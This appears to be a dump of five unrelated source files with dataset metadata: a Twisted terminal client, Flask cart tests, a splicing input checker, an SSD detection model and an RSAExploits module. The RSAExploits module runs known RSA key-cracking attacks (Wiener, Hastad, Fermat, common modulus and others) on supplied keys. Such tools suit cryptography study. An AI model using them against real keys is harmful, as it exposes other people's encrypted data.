xxsergzzxx/python-for-android | python-modules/twisted/twisted/conch/insults/client.py | 133 | 4251 | """
You don't really want to use this module. Try insults.py instead.
"""
from twisted.internet import protocol
class InsultsClient(protocol.Protocol):
escapeTimeout = 0.2
def __init__(self):
self.width = self.height = None
self.xpos = self.ypos = 0
self.commandQueue = []
self.inEscape = ''
def setSize(self, width, height):
call = 0
if self.width:
call = 1
self.width = width
self.height = height
if call:
self.windowSizeChanged()
def dataReceived(self, data):
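        # Buffer characters that follow ESC so multi-character escape
        # sequences (e.g. arrow keys) are reported as single key events;
        # endEscape() flushes the buffer if no known sequence completes
        # within escapeTimeout seconds.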
from twisted.internet import reactor
for ch in data:
if ch == '\x1b':
if self.inEscape:
self.keyReceived(ch)
self.inEscape = ''
else:
self.inEscape = ch
self.escapeCall = reactor.callLater(self.escapeTimeout,
self.endEscape)
elif ch in 'ABCD' and self.inEscape:
self.inEscape = ''
self.escapeCall.cancel()
if ch == 'A':
self.keyReceived('<Up>')
elif ch == 'B':
self.keyReceived('<Down>')
elif ch == 'C':
self.keyReceived('<Right>')
elif ch == 'D':
self.keyReceived('<Left>')
elif self.inEscape:
self.inEscape += ch
else:
self.keyReceived(ch)
def endEscape(self):
ch = self.inEscape
self.inEscape = ''
self.keyReceived(ch)
def initScreen(self):
self.transport.write('\x1b=\x1b[?1h')
def gotoXY(self, x, y):
"""Go to a position on the screen.
"""
self.xpos = x
self.ypos = y
self.commandQueue.append(('gotoxy', x, y))
def writeCh(self, ch):
"""Write a character to the screen. If we're at the end of the row,
ignore the write.
"""
if self.xpos < self.width - 1:
self.commandQueue.append(('write', ch))
self.xpos += 1
def writeStr(self, s):
"""Write a string to the screen. This does not wrap a the edge of the
screen, and stops at \\r and \\n.
"""
s = s[:self.width-self.xpos]
if '\n' in s:
s=s[:s.find('\n')]
if '\r' in s:
s=s[:s.find('\r')]
self.commandQueue.append(('write', s))
self.xpos += len(s)
def eraseToLine(self):
"""Erase from the current position to the end of the line.
"""
self.commandQueue.append(('eraseeol',))
def eraseToScreen(self):
"""Erase from the current position to the end of the screen.
"""
self.commandQueue.append(('eraseeos',))
def clearScreen(self):
"""Clear the screen, and return the cursor to 0, 0.
"""
self.commandQueue = [('cls',)]
self.xpos = self.ypos = 0
def setAttributes(self, *attrs):
"""Set the attributes for drawing on the screen.
"""
self.commandQueue.append(('attributes', attrs))
def refresh(self):
"""Redraw the screen.
"""
redraw = ''
for command in self.commandQueue:
if command[0] == 'gotoxy':
redraw += '\x1b[%i;%iH' % (command[2]+1, command[1]+1)
elif command[0] == 'write':
redraw += command[1]
elif command[0] == 'eraseeol':
redraw += '\x1b[0K'
elif command[0] == 'eraseeos':
redraw += '\x1b[OJ'
elif command[0] == 'cls':
redraw += '\x1b[H\x1b[J'
elif command[0] == 'attributes':
redraw += '\x1b[%sm' % ';'.join(map(str, command[1]))
else:
print command
self.commandQueue = []
self.transport.write(redraw)
def windowSizeChanged(self):
"""Called when the size of the window changes.
Might want to redraw the screen here, or something.
"""
def keyReceived(self, key):
"""Called when the user hits a key.
"""
| apache-2.0 | 1,074,567,732,489,870,200 | 29.804348 | 78 | 0.489532 | false | 4.037037 | false | false | false |
willrp/willbuyer | backend/tests/unit/controller/api/cart/test_remove_controller.py | 1 | 3858 | import pytest
import responses
import re
from flask import json
from json import JSONDecodeError
from werkzeug.exceptions import HTTPException
from requests import ConnectionError
from backend.service import CartService
from backend.util.response.cart import CartSchema
from backend.util.response.error import ErrorSchema
from backend.errors.request_error import ValidationError
@pytest.fixture(scope="function", autouse=True)
def controller_mocker(mocker):
mocker.patch.object(CartService, "__init__", return_value=None)
@pytest.fixture(scope="module")
def response_json():
return {
"total": {
"outlet": 10.55,
"retail": 20.9,
"symbol": "£"
},
"products": [
{
"id": "id",
"name": "string",
"image": "string",
"price": {
"outlet": 10.55,
"retail": 20.9,
"symbol": "£"
},
"discount": 80.5,
"amount": 1
}
]
}
def test_remove_controller(mocker, flask_app, willstores_ws, response_json):
mocker.patch.object(CartService, "remove_item", return_value=True)
mocker.patch.object(CartService, "to_list", return_value=[{"item_id": "id", "amount": 1}])
with responses.RequestsMock() as rsps:
rsps.add(responses.POST, re.compile(willstores_ws),
status=200,
json=response_json
)
with flask_app.test_client() as client:
response = client.post(
"api/cart/remove/test"
)
data = json.loads(response.data)
CartSchema().load(data)
assert response.status_code == 200
def test_remove_controller_unregistered(mocker, flask_app, willstores_ws):
mocker.patch.object(CartService, "remove_item", side_effect=ValidationError("test"))
with flask_app.test_client() as client:
response = client.post(
"api/cart/remove/test"
)
data = json.loads(response.data)
ErrorSchema().load(data)
assert response.status_code == 400
@pytest.mark.parametrize(
"method,http_method,test_url,error,status_code",
[
("remove_item", "POST", "api/cart/remove/test", HTTPException(), 400),
("remove_item", "POST", "api/cart/remove/test", ConnectionError(), 502),
("remove_item", "POST", "api/cart/remove/test", Exception(), 500)
]
)
def test_remove_controller_error(mocker, willstores_ws, get_request_function, method, http_method, test_url, error, status_code):
mocker.patch.object(CartService, method, side_effect=error)
make_request = get_request_function(http_method)
response = make_request(
test_url
)
data = json.loads(response.data)
ErrorSchema().load(data)
assert response.status_code == status_code
@pytest.mark.parametrize(
"test_url, status_code",
[
("api/cart/remove/test", 400),
("api/cart/remove/test", 401),
("api/cart/remove/test", 500),
("api/cart/remove/test", 504),
]
)
def test_remove_controller_http_error(mocker, flask_app, willstores_ws, json_error_recv, test_url, status_code):
mocker.patch.object(CartService, "remove_item", return_value=True)
mocker.patch.object(CartService, "to_list", return_value=[{"item_id": "id", "amount": 1}])
with responses.RequestsMock() as rsps:
rsps.add(responses.POST, re.compile(willstores_ws),
status=status_code,
json=json_error_recv
)
with flask_app.test_client() as client:
response = client.post(
test_url
)
data = json.loads(response.data)
ErrorSchema().load(data)
assert response.status_code == status_code
| mit | -556,904,506,098,188,350 | 29.125 | 129 | 0.600104 | false | 3.769306 | true | false | false |
Xinglab/SEASTAR | MATS/check_input.py | 1 | 1146 | #this script scans the input file for errors
import re,os,sys
res='replicate';
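#res holds the detected input type ('replicate' or 'pooled') or an error message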
ifile=open(sys.argv[1]);
ifile.readline();
ilines=ifile.readlines();
len_group_1=-1;len_group_2=-1;
for i in ilines:
element=re.findall('[^\t]+',i);
inc1=re.findall('[^,]+',element[1]);skp1=re.findall('[^,]+',element[2]);
inc2=re.findall('[^,]+',element[3]);skp2=re.findall('[^,]+',element[4]);
if (len(inc1)+len(inc2))==2:
res='pooled';
#check length of inclusion / skipping
if len(inc1)!=len(skp1):
res='Error: different number of inclusion and skipping counts.\n'+str(i);break;
if len(inc2)!=len(skp2):
res='Error: different number of inclusion and skipping counts.\n'+str(i);break;
#check the length of inclusion / skipping that is the same for all the exons
if len_group_1==-1:
len_group_1=len(inc1);
if len_group_2==-1:
len_group_2=len(inc2);
if len_group_1!=len(inc1):
res='Error: number of inclusion and skipping counts are not the same for different exons.\n'+str(i);break;
if len_group_2!=len(inc2):
res='Error: number of inclusion and skipping counts are not the same for different exons.\n'+str(i);break;
print(res);
| gpl-3.0 | 3,884,763,541,801,427,000 | 28.384615 | 108 | 0.679756 | false | 2.71564 | false | false | false |
vik001ind/RSAExploits | RSAExploits/rsa_cracker.py | 1 | 1531 | """ RSA_Cracker: Cracks RSA key set by using various attacks """
from RSAExploits.exploits.common_modulus import Common_Modulus
from RSAExploits.exploits.wiener import Wiener
from RSAExploits.exploits.boneh_durfee import Boneh_Durfee
from RSAExploits.exploits.hastad import Hastad
from RSAExploits.exploits.fermat import Fermat
from RSAExploits.exploits.common_factor import Common_Factor
from RSAExploits.exploits.franklin_reiter import Franklin_Reiter
__Exploit_Classes__ = []
def init():
""" Populate the Exploit_Classes list with exploits to run """
global __Exploit_Classes__
__Exploit_Classes__ = []
__Exploit_Classes__.append(Franklin_Reiter())
__Exploit_Classes__.append(Common_Modulus())
__Exploit_Classes__.append(Common_Factor())
__Exploit_Classes__.append(Wiener())
__Exploit_Classes__.append(Boneh_Durfee())
__Exploit_Classes__.append(Hastad())
__Exploit_Classes__.append(Fermat())
def attack(rsadata_list, info_dict = None, break_on_success = True):
""" Run all of the exploits in the list on the provided rsadata objects
Args:
rsadata_list: A list of RSA_Data objects to exploit
info_dict: Dictionary providing extra info to certain exploits
break_on_success: Stop after first successful exploit if true
"""
success = False
    for exploit in __Exploit_Classes__:
        if exploit.run(rsadata_list, info_dict):
            success = True
            if break_on_success:
                return success
    return success
| mit | -1,023,226,246,627,989,000 | 36.341463 | 75 | 0.69693 | false | 3.440449 | false | false | false |
mlperf/inference_results_v0.5 | closed/Google/code/ssd-large/tpu-ssd-large/home/kbuilder/mlperf-inference/google3/third_party/mlperf/inference/ssd/offline/ssd_model.py | 1 | 13883 | # Copyright 2018 Google. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model defination for the SSD Model.
Defines model_fn of SSD for TF Estimator. The model_fn includes SSD
model architecture, loss function, learning rate schedule, and evaluation
procedure.
T.-Y. Lin, P. Goyal, R. Girshick, K. He, and P. Dollar
Focal Loss for Dense Object Detection. arXiv:1708.02002
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools as it
import math
import numpy as np
import tensorflow as tf
import ssd_architecture
import ssd_constants
from tensorflow.contrib.tpu.python.tpu import bfloat16
BBOX_XFORM_CLIP = np.log(1000. / 16.)
class DefaultBoxes(object):
"""Default bounding boxes for 1200x1200 5 layer SSD.
  Default bounding box generation follows the order of (W, H, anchor_sizes).
Therefore, the tensor converted from DefaultBoxes has a shape of
[anchor_sizes, H, W, 4]. The last dimension is the box coordinates; 'ltrb'
is [ymin, xmin, ymax, xmax] while 'xywh' is [cy, cx, h, w].
"""
def __init__(self):
steps = [
int(ssd_constants.IMAGE_SIZE / fs) for fs in ssd_constants.FEATURE_SIZES
]
fk = ssd_constants.IMAGE_SIZE / np.array(steps)
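    # fk[idx] is the number of grid cells per image side on feature map idx;
    # anchor centers below are divided by it to normalize them to [0, 1].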
self.default_boxes = []
# Scale by image size.
scales = [
int(s * ssd_constants.IMAGE_SIZE / 300) for s in ssd_constants.SCALES
]
# size of feature and number of feature
for idx, feature_size in enumerate(ssd_constants.FEATURE_SIZES):
sk1 = scales[idx] / ssd_constants.IMAGE_SIZE
sk2 = scales[idx + 1] / ssd_constants.IMAGE_SIZE
sk3 = math.sqrt(sk1 * sk2)
all_sizes = [(sk1, sk1), (sk3, sk3)]
for alpha in ssd_constants.ASPECT_RATIOS[idx]:
w, h = sk1 * math.sqrt(alpha), sk1 / math.sqrt(alpha)
all_sizes.append((w, h))
all_sizes.append((h, w))
assert len(all_sizes) == ssd_constants.NUM_DEFAULTS[idx]
for w, h in all_sizes:
for i, j in it.product(range(feature_size), repeat=2):
cx, cy = (j + 0.5) / fk[idx], (i + 0.5) / fk[idx]
box = tuple(np.clip(k, 0, 1) for k in (cy, cx, h, w))
self.default_boxes.append(box)
assert len(self.default_boxes) == ssd_constants.NUM_SSD_BOXES
def to_ltrb(cy, cx, h, w):
return cy - h / 2, cx - w / 2, cy + h / 2, cx + w / 2
# For IoU calculation
self.default_boxes_ltrb = tuple(to_ltrb(*i) for i in self.default_boxes)
def __call__(self, order='ltrb'):
if order == 'ltrb':
return self.default_boxes_ltrb
if order == 'xywh':
return self.default_boxes
def decode_boxes(encoded_boxes, anchors, weights=None):
"""Decode boxes.
Args:
encoded_boxes: a tensor whose last dimension is 4 representing the
coordinates of encoded boxes in ymin, xmin, ymax, xmax order.
anchors: a tensor whose shape is the same as `boxes` representing the
coordinates of anchors in ymin, xmin, ymax, xmax order.
weights: None or a list of four float numbers used to scale coordinates.
Returns:
encoded_boxes: a tensor whose shape is the same as `boxes` representing the
decoded box targets.
"""
with tf.name_scope('decode_box'):
encoded_boxes = tf.cast(encoded_boxes, dtype=anchors.dtype)
dy = encoded_boxes[..., 0:1]
dx = encoded_boxes[..., 1:2]
dh = encoded_boxes[..., 2:3]
dw = encoded_boxes[..., 3:4]
if weights:
dy /= weights[0]
dx /= weights[1]
dh /= weights[2]
dw /= weights[3]
dh = tf.minimum(dh, BBOX_XFORM_CLIP)
dw = tf.minimum(dw, BBOX_XFORM_CLIP)
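    # Clipping dh/dw at log(1000/16) keeps the tf.exp calls below from
    # overflowing on degenerate regression outputs.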
anchor_ymin = anchors[..., 0:1]
anchor_xmin = anchors[..., 1:2]
anchor_ymax = anchors[..., 2:3]
anchor_xmax = anchors[..., 3:4]
anchor_h = anchor_ymax - anchor_ymin
anchor_w = anchor_xmax - anchor_xmin
anchor_yc = anchor_ymin + 0.5 * anchor_h
anchor_xc = anchor_xmin + 0.5 * anchor_w
decoded_boxes_yc = dy * anchor_h + anchor_yc
decoded_boxes_xc = dx * anchor_w + anchor_xc
decoded_boxes_h = tf.exp(dh) * anchor_h
decoded_boxes_w = tf.exp(dw) * anchor_w
decoded_boxes_ymin = decoded_boxes_yc - 0.5 * decoded_boxes_h
decoded_boxes_xmin = decoded_boxes_xc - 0.5 * decoded_boxes_w
decoded_boxes_ymax = decoded_boxes_yc + 0.5 * decoded_boxes_h
decoded_boxes_xmax = decoded_boxes_xc + 0.5 * decoded_boxes_w
decoded_boxes = tf.concat([
decoded_boxes_ymin, decoded_boxes_xmin, decoded_boxes_ymax,
decoded_boxes_xmax
],
axis=-1)
return decoded_boxes
def select_top_k_scores(scores_in, pre_nms_num_detections=5000):
"""Select top_k scores and indices for each class.
Args:
scores_in: a Tensor with shape [batch_size, num_classes, N], which stacks
class logit outputs on all feature levels. The N is the number of total
anchors on all levels. The num_classes is the number of classes predicted
by the model.
pre_nms_num_detections: Number of candidates before NMS.
Returns:
scores and indices: Tensors with shape [batch_size, pre_nms_num_detections,
num_classes].
"""
_, num_class, num_anchors = scores_in.get_shape().as_list()
scores = tf.reshape(scores_in, [-1, num_anchors])
top_k_scores, top_k_indices = tf.nn.top_k(
scores, k=pre_nms_num_detections, sorted=True)
top_k_scores = tf.reshape(top_k_scores,
[-1, num_class, pre_nms_num_detections])
top_k_indices = tf.reshape(top_k_indices,
[-1, num_class, pre_nms_num_detections])
return tf.transpose(top_k_scores, [0, 2, 1]), tf.transpose(
top_k_indices, [0, 2, 1])
def _filter_scores(scores, boxes, min_score=ssd_constants.MIN_SCORE):
mask = scores > min_score
scores = tf.where(mask, scores, tf.zeros_like(scores))
boxes = tf.where(
tf.tile(tf.expand_dims(mask, 2), (1, 1, 4)), boxes, tf.zeros_like(boxes))
return scores, boxes
def non_max_suppression(scores_in,
boxes_in,
top_k_indices,
source_id,
raw_shape,
num_detections=ssd_constants.MAX_NUM_EVAL_BOXES):
"""Implement Non-maximum suppression.
Args:
scores_in: a Tensor with shape [batch_size,
ssd_constants.MAX_NUM_EVAL_BOXES, num_classes]. The top
ssd_constants.MAX_NUM_EVAL_BOXES box scores for each class.
boxes_in: a Tensor with shape [batch_size, N, 4], which stacks box
regression outputs on all feature levels. The N is the number of total
anchors on all levels.
top_k_indices: a Tensor with shape [batch_size,
ssd_constants.MAX_NUM_EVAL_BOXES, num_classes]. The indices for these top
boxes for each class.
source_id: a Tensor with shape [batch_size]
raw_shape: a Tensor with shape [batch_size, 3]
num_detections: maximum output length.
Returns:
A tensor size of [batch_size, num_detections, 6] represents boxes, labels
and scores after NMS.
"""
_, _, num_classes = scores_in.get_shape().as_list()
source_id = tf.to_float(
tf.tile(tf.expand_dims(source_id, 1), [1, num_detections]))
raw_shape = tf.to_float(
tf.tile(tf.expand_dims(raw_shape, 1), [1, num_detections, 1]))
list_of_all_boxes = []
list_of_all_scores = []
list_of_all_classes = []
# Skip background class.
for class_i in range(1, num_classes, 1):
boxes = tf.batch_gather(boxes_in, top_k_indices[:, :, class_i])
class_i_scores = scores_in[:, :, class_i]
class_i_scores, boxes = _filter_scores(class_i_scores, boxes)
(class_i_post_scores,
class_i_post_boxes) = ssd_architecture.non_max_suppression_padded(
scores=tf.to_float(class_i_scores),
boxes=tf.to_float(boxes),
max_output_size=num_detections,
iou_threshold=ssd_constants.OVERLAP_CRITERIA)
class_i_classes = tf.fill(tf.shape(class_i_post_scores), class_i)
list_of_all_boxes.append(class_i_post_boxes)
list_of_all_scores.append(class_i_post_scores)
list_of_all_classes.append(class_i_classes)
post_nms_boxes = tf.concat(list_of_all_boxes, axis=1)
post_nms_scores = tf.concat(list_of_all_scores, axis=1)
post_nms_classes = tf.concat(list_of_all_classes, axis=1)
# sort all results.
post_nms_scores, sorted_indices = tf.nn.top_k(
tf.to_float(post_nms_scores), k=num_detections, sorted=True)
post_nms_boxes = tf.batch_gather(post_nms_boxes, sorted_indices)
post_nms_classes = tf.batch_gather(post_nms_classes, sorted_indices)
detections_result = tf.stack([
source_id,
post_nms_boxes[:, :, 0],
post_nms_boxes[:, :, 1],
post_nms_boxes[:, :, 2],
post_nms_boxes[:, :, 3],
post_nms_scores,
tf.to_float(post_nms_classes),
],
axis=2)
return detections_result
def concat_outputs(cls_outputs, box_outputs):
"""Concatenate predictions into a single tensor.
This function takes the dicts of class and box prediction tensors and
concatenates them into a single tensor for comparison with the ground truth
boxes and class labels.
Args:
cls_outputs: an OrderDict with keys representing levels and values
representing logits in [batch_size, height, width,
num_anchors * num_classses].
box_outputs: an OrderDict with keys representing levels and values
representing box regression targets in
[batch_size, height, width, num_anchors * 4].
Returns:
    concatenated cls_outputs with shape [batch_size, num_classes, N] and
    concatenated box_outputs with shape [batch_size, 4, N], where N is number
of anchors.
"""
assert set(cls_outputs.keys()) == set(box_outputs.keys())
# This sort matters. The labels assume a certain order based on
# ssd_constants.FEATURE_SIZES, and this sort matches that convention.
keys = sorted(cls_outputs.keys())
flat_cls = []
flat_box = []
for i, k in enumerate(keys):
# TODO(taylorrobie): confirm that this reshape, transpose,
# reshape is correct.
scale = ssd_constants.FEATURE_SIZES[i]
last_dim_size = scale * scale * ssd_constants.NUM_DEFAULTS[i]
split_shape = (ssd_constants.NUM_CLASSES, ssd_constants.NUM_DEFAULTS[i])
assert cls_outputs[k].shape[3] == split_shape[0] * split_shape[1]
flat_cls.append(
tf.reshape(
tf.transpose(cls_outputs[k], [0, 3, 1, 2]),
[-1, ssd_constants.NUM_CLASSES, last_dim_size]))
split_shape = (ssd_constants.NUM_DEFAULTS[i], 4)
assert box_outputs[k].shape[3] == split_shape[0] * split_shape[1]
flat_box.append(
tf.reshape(
tf.transpose(box_outputs[k], [0, 3, 1, 2]), [-1, 4, last_dim_size]))
return tf.concat(flat_cls, axis=2), tf.concat(flat_box, axis=2)
def _model_fn(images, source_id, raw_shape, params, model):
"""Model defination for the SSD model based on ResNet-50.
Args:
images: the input image tensor with shape [batch_size, height, width, 3].
The height and width are fixed and equal.
source_id: a Tensor with shape [batch_size]
raw_shape: a Tensor with shape [batch_size, 3]
params: the dictionary defines hyperparameters of model. The default
settings are in default_hparams function in this file.
model: the SSD model outputs class logits and box regression outputs.
Returns:
spec: the EstimatorSpec or TPUEstimatorSpec to run training, evaluation,
or prediction.
"""
features = images
def _model_outputs():
return model(features, params, is_training_bn=False)
if params['use_bfloat16']:
with bfloat16.bfloat16_scope():
cls_outputs, box_outputs = _model_outputs()
levels = cls_outputs.keys()
for level in levels:
cls_outputs[level] = tf.cast(cls_outputs[level], tf.float32)
box_outputs[level] = tf.cast(box_outputs[level], tf.float32)
else:
cls_outputs, box_outputs = _model_outputs()
levels = cls_outputs.keys()
flattened_cls, flattened_box = concat_outputs(cls_outputs, box_outputs)
y_min, x_min, y_max, x_max = tf.split(flattened_box, 4, axis=1)
flattened_box = tf.concat([x_min, y_min, x_max, y_max], axis=1)
# [batch_size, 4, N] to [batch_size, N, 4]
flattened_box = tf.transpose(flattened_box, [0, 2, 1])
anchors = tf.convert_to_tensor(DefaultBoxes()('ltrb'))
decoded_boxes = decode_boxes(
encoded_boxes=flattened_box,
anchors=anchors,
weights=ssd_constants.BOX_CODER_SCALES)
pred_scores = tf.nn.softmax(flattened_cls, axis=1)
pred_scores, indices = select_top_k_scores(pred_scores,
ssd_constants.MAX_NUM_EVAL_BOXES)
detections = non_max_suppression(
scores_in=pred_scores,
boxes_in=decoded_boxes,
top_k_indices=indices,
source_id=source_id,
raw_shape=raw_shape)
return detections
def ssd_model_fn(images, source_id, raw_shape, params):
"""SSD model."""
return _model_fn(
images, source_id, raw_shape, params, model=ssd_architecture.ssd)
def default_hparams():
return tf.contrib.training.HParams(
use_bfloat16=True,
transpose_input=True,
nms_on_tpu=True,
conv0_space_to_depth=False,
use_cocoeval_cc=True,
use_spatial_partitioning=False,
)
| apache-2.0 | 5,158,396,806,468,357,000 | 34.688946 | 80 | 0.649715 | false | 3.275065 | false | false | false |